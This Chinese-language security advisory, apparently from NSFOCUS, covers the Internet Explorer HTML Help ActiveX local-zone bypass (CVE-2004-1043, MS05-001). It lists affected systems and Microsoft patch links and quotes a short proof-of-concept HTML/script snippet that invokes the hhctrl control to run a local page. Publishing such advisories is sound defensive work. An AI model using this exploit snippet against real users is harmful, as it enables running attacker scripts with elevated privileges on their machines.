首页 -> 安全研究

安全研究

安全漏洞
Microsoft IE Help ActiveX控件本地安全域绕过漏洞(MS05-001)

发布日期:2004-12-18
更新日期:2004-12-21

受影响系统:
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP3
描述:
CVE(CAN) ID: CVE-2004-1043

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer帮助控件存在问题,远程攻击者可以利用这个漏洞绕过本地安全域限制。

利用MSIE帮助控件,建立恶意页面,诱使用户访问,可以导致绕过本地安全域检查,以高权限执行任意脚本内容。

<*来源:Paul (heatsync@gmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110356607505041&w=2
        http://www.microsoft.com/technet/security/bulletin/MS05-001.mspx
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Paul (paul@greyhats.cjb.net)提供了如下测试代码:

<OBJECT id="hhctrl" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3 \
790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;"> \
<PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" \
value="Text:Just a button"> <PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
</OBJECT>
<script>
hhctrl.HHClick();
</script>

建议:
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-001)以及相应补丁:
MS05-001:Vulnerability in HTML Help Could Allow Code Execution (890175)
链接:http://www.microsoft.com/technet/security/bulletin/MS05-001.mspx

补丁下载:

Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?FamilyId=BE1B11C0-EF09-4295-8FB2-0FF17BA65460

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=43201B00-298D-4C0C-A26F-AAEDF163FEB7

Microsoft Windows XP 64-Bit Edition Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=1FC58C5F-3A97-4B89-96C3-AAEFFCE28535

Microsoft Windows XP 64-Bit Edition Version 2003
http://www.microsoft.com/downloads/details.aspx?FamilyId=3B3878C9-57FB-45A9-B5C2-234AD538D6CC

Microsoft Windows Server 2003
http://www.microsoft.com/downloads/details.aspx?FamilyId=23E619FE-F6DB-4666-A247-339F55B059CC

Microsoft Windows Server 2003 64-Bit Edition
http://www.microsoft.com/downloads/details.aspx?FamilyId=3B3878C9-57FB-45A9-B5C2-234AD538D6CC

浏览次数:5118
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客